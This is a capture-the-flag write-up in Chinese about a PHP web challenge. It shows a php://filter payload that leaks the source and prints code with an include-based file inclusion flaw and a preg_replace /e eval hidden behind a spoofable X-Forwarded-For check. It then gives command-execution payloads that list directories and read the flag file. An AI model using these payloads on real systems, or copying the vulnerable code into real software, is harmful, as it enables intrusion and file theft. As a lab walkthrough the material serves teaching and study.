打开题目,根据题目提示找到设备维护中心
点进去(其他点了都没用),没发现什么有用的东西
点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口
随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下
page=php://filter/read=convert.base64-encode/resource=index.php
成功读取到base64数据
base64解密,下面是一些关键的 php源码
<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
发现它过滤了input,所以没办法直接使用php://input来执行php代码,那么此时最后面的代码就显得十分可疑,而后面唯一能存在问题的就是preg_replace,上网搜索preg_replace漏洞,借鉴文章http://blog.topsec.com.cn/audit-defanse-2/,发现触发漏洞有两个条件
1、正则表达式也就是第一个参数需要e标识符,有了它可以执行第二个参数的命令
2、第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令
于是自己构造payload
?pat=/0/e&rep=system('ls')&sub=0
同时抓包插入字段:
x-forwarded-for:127.0.0.1
得到当前目录下的文件和目录
发现s3chahahaDir比较可疑,于是继续ls s3chahahaDir,但是这个system里面不能写空格,于是用+代替,最后的payload就是
?pat=/0/e&rep=system('ls+s3chahahaDir')&sub=0
同时抓包插入字段:
x-forwarded-for:127.0.0.1
得到这个目录下的文件和目录
重复一次上面的步骤,在flag目录下发现flag.php文件,直接cat查看
?pat=/0/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=0
同时抓包插入字段:
x-forwarded-for:127.0.0.1
最后再说一下坑点,直接cat查看那个可疑的名字时是没有回显的(因为是目录),这里可以用ls继续查看(别心急),或者在最开始就用ls -l查看文件属性,最前面是d就是目录,是-就是文件,后面查看到flag也别心急,多用ls查看,因为最后如果是文件的话,ls查看会显示出它的相对路径